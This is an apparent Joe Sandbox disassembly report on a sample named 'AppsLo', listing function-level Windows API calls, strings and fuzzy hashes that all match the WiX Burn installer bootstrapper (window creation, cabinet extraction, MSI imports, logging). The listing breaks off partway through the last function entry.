lstrlenW.KERNEL32(burn.filehandle.self,?,?,00F55266,?,?,00000000,?,?), ref: 00F543D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00F55266,?,?,00000000,?,?), ref: 00F543DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00F55266,?,?,00000000,?,?), ref: 00F543EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00F55266,?,?,00000000,?,?), ref: 00F543FE

Strings

Missing required parameter for switch: %ls, xrefs: 00F544A4
burn.filehandle.attached, xrefs: 00F5434D, 00F54355, 00F5435A, 00F5435B, 00F5437B, 00F5449F
user.cpp, xrefs: 00F54495, 00F544C1
Failed to parse file handle: '%ls', xrefs: 00F54482
burn.filehandle.self, xrefs: 00F543CB, 00F543D3, 00F543D8, 00F543D9, 00F543F9, 00F544CB
Failed to initialize user section., xrefs: 00F54467

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3039292287-3209860532
Opcode ID: 4e074b349a5d01668dd085bcac3ffc1281d49c06f924b6e656091456124e3327
Instruction ID: 94a461f966092f6ec916e0c21121ab2bfb68b511edc52a80193e2140fb4f3124
Opcode Fuzzy Hash: 4e074b349a5d01668dd085bcac3ffc1281d49c06f924b6e656091456124e3327
Instruction Fuzzy Hash: 3351E371A40215BFDB20EF68DC86F9A7768EF04761F00011AFF14A7290D774B880EBA5

Function 00F6E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32(?,?), ref: 00F6E7FF
RegisterClassW.USER32(?), ref: 00F6E82B
GetLastError.KERNEL32 ref: 00F6E836
CreateWindowExW.USER32(00000080,00FA9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00F6E89D
GetLastError.KERNEL32 ref: 00F6E8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00F6E945

Strings

WixBurnMessageWindow, xrefs: 00F6E824, 00F6E940
Failed to create window., xrefs: 00F6E8D5
uithread.cpp, xrefs: 00F6E85A, 00F6E8CB
Unexpected return value from message pump., xrefs: 00F6E930
Failed to register window., xrefs: 00F6E864

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: e69ddec020178b9b7315f5c8a75d9546d3353593e255b469a54facec8c30a001
Instruction ID: 1aac417d896a0ce84fd04c4429514b79752c0c460e6e72e83fb557bb75c56ffb
Opcode Fuzzy Hash: e69ddec020178b9b7315f5c8a75d9546d3353593e255b469a54facec8c30a001
Instruction Fuzzy Hash: 70419477D00229ABDB208BA5DD44BDEBFB8EF05760F104166F904AB150D770AD44EBA1

Function 00F5C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00F5C47F,00F55405,?,?,00F55445), ref: 00F5C2D6
GetLastError.KERNEL32(?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?,00000000), ref: 00F5C2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?), ref: 00F5C336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?,00000000), ref: 00F5C33C
DuplicateHandle.KERNELBASE(00000000,?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?,00000000), ref: 00F5C33F
GetLastError.KERNEL32(?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?,00000000), ref: 00F5C349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?,00000000), ref: 00F5C39B
GetLastError.KERNEL32(?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?,00000000), ref: 00F5C3A5

Strings

crypt32.dll, xrefs: 00F5C397
Failed to open file: %ls, xrefs: 00F5C318
container.cpp, xrefs: 00F5C30B, 00F5C36D, 00F5C3C9
Failed to move file pointer to container offset., xrefs: 00F5C3D3
Failed to open container., xrefs: 00F5C3F1
Failed to duplicate handle to container: %ls, xrefs: 00F5C37A
feclient.dll, xrefs: 00F5C398

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 09e7ab53b99de6bf301c572f9162ce1fac671d1e0e307f828d487a6ae711bbd9
Instruction ID: cff7d393e59a308a7e805be47e28209340a1c892e185e021417e71ad28509fab
Opcode Fuzzy Hash: 09e7ab53b99de6bf301c572f9162ce1fac671d1e0e307f828d487a6ae711bbd9
Instruction Fuzzy Hash: 8841D632540309AFDB219F199D45E1B3AA5EB84722B258029FE15DB291EB71D805FAE0

Function 00F92AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F53838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00F53877
Part of subcall function 00F53838: GetLastError.KERNEL32 ref: 00F53881

Part of subcall function 00F94A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00F94A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00F92B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00F92B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00F92B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00F92BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00F92BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00F92BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00F92C01

Strings

MsiGetProductInfoExW, xrefs: 00F92BB6
Msi.dll, xrefs: 00F92B09
MsiSourceListAddSourceExW, xrefs: 00F92BF6
MsiEnumProductsExW, xrefs: 00F92B76
MsiDetermineApplicablePatchesW, xrefs: 00F92B56
MsiDeterminePatchSequenceW, xrefs: 00F92B36
MsiSetExternalUIRecord, xrefs: 00F92BD6
MsiGetPatchInfoExW, xrefs: 00F92B96

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: 8159ec1c2c18d5946945a87a473c185f33a84aed6eb0806e1a699377380aa578
Instruction ID: 3407da7c65ae6a0cc4b9f7d25be8953b1315ffa624740047f39f150e64acb52e
Opcode Fuzzy Hash: 8159ec1c2c18d5946945a87a473c185f33a84aed6eb0806e1a699377380aa578
Instruction Fuzzy Hash: 0C31E470D4020DEFEB129F22ED92B997BA2F754758F0002AAE804961B0E7F54C45FF55

Function 00F9304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153
libraryloadercomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00F93609,00000000,?,00000000), ref: 00F93069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F7C025,?,00F55405,?,00000000,?), ref: 00F93075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00F930B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F930C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00F930CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F930D6
CoCreateInstance.OLE32(00FBB6B8,00000000,00000001,00F9B818,?,?,?,?,?,?,?,?,?,?,?,00F7C025), ref: 00F93111
ExitProcess.KERNEL32 ref: 00F931C0

Strings

kernel32.dll, xrefs: 00F93059
xmlutil.cpp, xrefs: 00F93099
Wow64DisableWow64FsRedirection, xrefs: 00F930BB
IsWow64Process, xrefs: 00F930AF
Wow64EnableWow64FsRedirection, xrefs: 00F930C3
Wow64RevertWow64FsRedirection, xrefs: 00F930CE

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: ec6752e6ba597677b68a1b6a260cfada4f94579ed16b53ed090eaca9461cfa09
Instruction ID: 315160602aa2dbaa7e6a08e0030c9e681e604dea2783e66f1b30fabf166bc4ad
Opcode Fuzzy Hash: ec6752e6ba597677b68a1b6a260cfada4f94579ed16b53ed090eaca9461cfa09
Instruction Fuzzy Hash: BF41C436F01215ABEF25DFA9C845FAEB7B4EF44720F114169E901EB260DB71DE40AB90

Function 00F71741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00F5C3EB,?,00000000,?,00F5C47F), ref: 00F71778
GetLastError.KERNEL32(?,00F5C3EB,?,00000000,?,00F5C47F,00F55405,?,?,00F55445,00F55445,00000000,?,00000000), ref: 00F71781

Strings

Failed to create operation complete event., xrefs: 00F717F5
Failed to wait for operation complete., xrefs: 00F71854
wininet.dll, xrefs: 00F71757
Failed to create begin operation event., xrefs: 00F717AF
Failed to create extraction thread., xrefs: 00F71841
Failed to copy file name., xrefs: 00F71763
cabextract.cpp, xrefs: 00F717A5, 00F717EB, 00F71837

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 4d715bccd022cdb194481c898f828df5f243f0d11d2ad843d2f6f27ad2d649c4
Instruction ID: 8c99f046e0a882e9095a9e3b23e8a6959210dea221d34ba53fc9627000492c08
Opcode Fuzzy Hash: 4d715bccd022cdb194481c898f828df5f243f0d11d2ad843d2f6f27ad2d649c4
Instruction Fuzzy Hash: F221D8B7D4063A76D325165D4D46B2B759CFB05BB0B028227BD08BB180E754DC09B5E3

Function 00F8FCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00F8FCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 00F8FCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00F8FD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00F8FD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00F8FD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00F8FD8B

Strings

SystemFunction040, xrefs: 00F8FCCB
CryptUnprotectMemory, xrefs: 00F8FD6C
Crypt32.dll, xrefs: 00F8FD0C
SystemFunction041, xrefs: 00F8FCD8
CryptProtectMemory, xrefs: 00F8FD20
AdvApi32.dll, xrefs: 00F8FCB5
cryputil.cpp, xrefs: 00F8FD60

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: 6175deeba6c22babdbbd24e8f08bd0ae8535832ba179a18465cde1903ebeb7ec
Instruction ID: e37db01d607b940445de8e017ed660631fae286368503cd72a14c129370b116a
Opcode Fuzzy Hash: 6175deeba6c22babdbbd24e8f08bd0ae8535832ba179a18465cde1903ebeb7ec
Instruction Fuzzy Hash: 23213837E412299FC7316B56AE45BD67990A700B61F190235EE00E72A4E7E4DC04BFD2

Function 00F708C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00F708F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00F7090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00F7090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00F70912
GetLastError.KERNEL32(?,?), ref: 00F7091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00F7098B
GetLastError.KERNEL32(?,?), ref: 00F70998

Strings

Failed to duplicate handle to cab container., xrefs: 00F7094A
Failed to open cabinet file: %hs, xrefs: 00F709C9
<the>.cab, xrefs: 00F708EB
cabextract.cpp, xrefs: 00F70940, 00F709BC
Failed to add virtual file pointer for cab container., xrefs: 00F70971

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 7f4077404423f78453c1262772f90ad5af8ad8c77e384706303a4a689223d906
Instruction ID: b9eb2e0f81e1011de5881ce68d62b2063ca806ed4516e3ff237d1b5da7980576
Opcode Fuzzy Hash: 7f4077404423f78453c1262772f90ad5af8ad8c77e384706303a4a689223d906
Instruction Fuzzy Hash: 4E31F472D41139FBEB215B559D49F5FBA68EF05760F114116FE08B7290EB20AC00EAE2

Function 00F63F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F63AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00F63FB5,feclient.dll,?,00000000,?,?,?,00F54B12), ref: 00F63B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00F54B12,?,?,00F9B488,?,00000001,00000000,00000000), ref: 00F6404C

Strings

crypt32.dll, xrefs: 00F63FF2, 00F64057, 00F6405F, 00F640C6, 00F64100, 00F64141, 00F64160, 00F6419E, 00F641C8
Failed to open log: %ls, xrefs: 00F640C8
clbcatq.dll, xrefs: 00F64185
Failed to get non-session specific TEMP folder., xrefs: 00F640F6
feclient.dll, xrefs: 00F63FAF, 00F6405C
msasn1.dll, xrefs: 00F64162, 00F641A3
Failed to get current directory., xrefs: 00F6402E
Failed to copy full log path to prefix., xrefs: 00F641AF
log, xrefs: 00F63FF3
Failed to copy log path to prefix., xrefs: 00F6416E
Failed to copy log extension to extension., xrefs: 00F64191
Setup, xrefs: 00F63FF9

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: 57dc35f0cc2f70d3256eee903a3bb777e5b053b93a760e18ee52a5db6d5cf00e
Instruction ID: f409e972b3934f393e1af279be2148335aa15620bc26e513975b2f95b377ec15
Opcode Fuzzy Hash: 57dc35f0cc2f70d3256eee903a3bb777e5b053b93a760e18ee52a5db6d5cf00e
Instruction Fuzzy Hash: 4661B171A00625BEDF26AF64CC42B6A7BA8EF16750F044265FD00DB181EB74FD90B7A1

Function 00F56DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,00F55445,00000006,?,00F582B9,?,?,?,00000000,00000000,00000001), ref: 00F56DC8

Part of subcall function 00F556A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00F56595,00F56595,?,00F5563D,?,?,00000000), ref: 00F556E5
Part of subcall function 00F556A9: GetLastError.KERNEL32(?,00F5563D,?,?,00000000,?,?,00F56595,?,00F57F02,?,?,?,?,?), ref: 00F55714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00F582B9), ref: 00F56F59

Strings

Attempt to set built-in variable value: %ls, xrefs: 00F56E56
Setting numeric variable '%ls' to value %lld, xrefs: 00F56EFA
Setting hidden variable '%ls', xrefs: 00F56E86
variable.cpp, xrefs: 00F56E4B
Failed to insert variable '%ls'., xrefs: 00F56E0D
Failed to find variable value '%ls'., xrefs: 00F56DE3
Setting string variable '%ls' to value '%ls', xrefs: 00F56EED
Failed to set value of variable: %ls, xrefs: 00F56F41
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00F56ED0
Unsetting variable '%ls', xrefs: 00F56F15
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00F56F6B

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 880f8aec0643a7311459010759912b6af4e8f43190be8d86f28d0d4085bcc1b2
Instruction ID: dec0ebd9a005f6ebe1945a84377ae1059ece891682aa92602206f3c454476e47
Opcode Fuzzy Hash: 880f8aec0643a7311459010759912b6af4e8f43190be8d86f28d0d4085bcc1b2
Instruction Fuzzy Hash: 51510671E00215ABDB309F18DC4AF6B3BA8EB51726FA00119FE24D7281D675DC44FAE2

Function 00F54AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00F54C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F54C75

Strings

Failed while running , xrefs: 00F54C2A
WixBundleLayoutDirectory, xrefs: 00F54BF5
Failed to open log., xrefs: 00F54B18
Failed to create the message window., xrefs: 00F54B98
Failed to set layout directory variable to value provided from command-line., xrefs: 00F54C06
Failed to check global conditions, xrefs: 00F54B49
Failed to set action variables., xrefs: 00F54BC4
Failed to set registration variables., xrefs: 00F54BDE
Failed to query registration., xrefs: 00F54BAE

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 26a9938114a1ab163fa9cbae2a00f5fcfa5da5912ac4b843e1612166941f332f
Instruction ID: 09fefbd0a25f5551537f5db1447c30e0c1d776b2b6b87af39e39ade5f9acec9b
Opcode Fuzzy Hash: 26a9938114a1ab163fa9cbae2a00f5fcfa5da5912ac4b843e1612166941f332f
Instruction Fuzzy Hash: 1C412932A0561ABBDF165A20CD49FBAB66CFF4075AF000216FE04A2250DB74FD98B7D1

Function 00F52DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00F52E5F
GetLastError.KERNEL32 ref: 00F52E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00F52F09
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00F52F96
GetLastError.KERNEL32 ref: 00F52FA3
Sleep.KERNEL32(00000064), ref: 00F52FB7
CloseHandle.KERNEL32(?), ref: 00F5301F

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00F52F66
pathutil.cpp, xrefs: 00F52E8D
4#v, xrefs: 00F52E5F

Memory Dump Source

Source File: 00000007.00000002.2464405499.0000000000F51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00F50000, based on PE: true

Associated: 00000007.00000002.2464385625.0000000000F50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464508297.0000000000FBA000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2464567720.0000000000FBD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f50000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4#v$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-1777530710
Opcode ID: a8dd3a18db19564d425838a7c3c9477a561fda6922893fc2ceeb79cc11741d02
Instruction ID: 5ff55fd087934e19e38b06f755e2ce84701c18daa5ed46c6f7ab0812592574c8
Opcode Fuzzy Hash: a8dd3a18db19564d425838a7c3c9477a561fda6922893fc2ceeb79cc11741d02
Instruction Fuzzy Hash: 3571A872D01229ABDB719F58ED49BAEB7B4AB08721F0002D5FE04E7190D7349E84EF50

Function 00F6EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00F5548E,?,?), ref: 00F6EA9D
GetLastError.KERNEL32(?,00F5548E,?,?), ref: 00F6EAAA
CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00F6EB03
GetLastError.KERNEL32(?,00F5548E,?,?), ref: 00F6EB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00F5548E,?,?), ref: 00F6EB4B
